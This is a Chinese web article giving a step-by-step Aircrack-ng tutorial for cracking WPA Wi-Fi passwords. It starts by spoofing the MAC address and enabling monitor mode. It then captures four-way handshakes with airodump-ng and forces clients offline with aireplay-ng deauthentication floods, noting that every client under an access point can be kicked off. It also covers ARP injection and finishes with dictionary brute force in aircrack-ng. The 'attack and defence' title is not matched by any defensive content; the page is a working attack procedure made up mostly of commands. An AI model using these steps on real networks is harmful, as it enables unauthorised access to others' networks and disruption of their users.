无线网攻防Aircrack -ng(抓包方式)pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范无线网攻防Aircrack -ng(抓包方式)
阅读排行

无线网攻防Aircrack -ng(抓包方式)


2017/10/17  编辑:小白 来源:ARP联盟

wilan网攻防Aircrack -ng(抓包方式)

1.修改mac地址信息。

    ifconfig wlan0 down

     macchange -A wlan0

    ifconfig wlan0 up

2.监听

    airmon-ng start wlan0

3.抓包

    airodump-ng  mon0

    airodump-ng—w dota -c 10【信道】 - -bssid 5A-1F-CC-B1-A1:25 mon0(ctrl+c退出, 保留终端或者-w dota从而保存握手包cap,如果想针对某个客户端就加个 -c 客户端)

备注:airodump界面介绍说明:

    BSSID:ap的mac地址。

    PWR:信号强度, 如果PWR是-1说明网卡的驱动不支持报告信号水平。 如果是部分客户端的PWR为-1, 那么说明该客户端不就在您网卡能监听到的范围内, 但是你能捕捉到AP发往该客户端的数据信息。

    BeaconsAP发出的通告编号, 每个接入点(AP)在最低速率(1M)时差不多每秒会发送send10个左右的beacon, 所以它们能在很远的地方就被发现。

    #Data被捕获到的数据分组的数量(如果是WEP, 则代表唯一IV的数量), 包括广播分组。

    #/s过去10秒钟内每秒捕获数据分组的数量

    STATION:ap上面连载的用户。

    CH:信道

4.Deauth验证攻击:aireplay-ng -0 10 -a<ap mac> -c <ap对应的客户端mac> mon0【可以通过观察airmon-ng start mon0右上角查看握手包是否捕获到了。 如果不用-c那么所有的ap下客户端都掉线, 都被攻击。 】

参数解释:-0指的是采取Deautenticate攻击方式, 后面为发送次数;

                  -a ap mac

                  -c 客户端mac

提醒一定要注意:Deauth攻击往往并不是一次攻击就成功, 为确保成功截获有请求需要反复来进行(WPA破解不用等到数据Data达到几万, 因为它只要一个包含WPA4次握手验证包就可以能够了, 还是有最好每操作一步新建一个窗口, 方便攻击时候查看数据情况从而确定握手包是否抓取成功。 )

deauth原理:强制让合法无线客户端与AP被断开, 当它被从WLAN 中断开后, 这个无线客户端会全自动尝试重新连接到AP上, 在这个重新连接过程中, 数据通信就产生了, 之后利用airodump捕获一个无线路由器与无线客户端四次握手的过程, 生成一个包含四次握手的cap包。 然后再利用字典进行暴力。 如果deauth攻击不行, 或者没客户端没流量情况下, 可以通过注入攻击。

aireplay-ng -3 b ap mac -h 个人网卡地址 mon。

5.跑字典

aircrack-ng -w password.txt dota-*.cap(防止有时候-w记录不全, cap包用正则表达式方式引用最好。 )

备注:密码字典的生成最好是不同的类型的字典放在一个txt, 或者根据记录特性归类成不同的txt, 这样破解时候方便。

相关文章

无线网攻防Aircrack -ng(抓包方式):1.修改mac地址信息。

无线电波隐形衣,穿上它可以透明:俄罗斯卫星网报导称,两位「莫斯科国立钢铁合金学院」的学者将要制造出,带有非具象的「电磁」、「光学」特性的物质。

腾达无线路由器怎么连接?路由器该怎么设置:如果是带DHCP功能的光猫(背后4个LAN)接口,取一台电脑连接到光猫电脑里进入命令行(Windows的话wins+r,输入cmd,确定),执行命令ipconfig看一下网关是192.168.0.1还是192.168.1.1接下来分两种情况...。

iPhone 7s/8 将会都将支持无线充电,这功能太实用了:无线充电的原理一样,但在传输方式上有三种:电磁感应式,无线电波式,磁场共振式。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图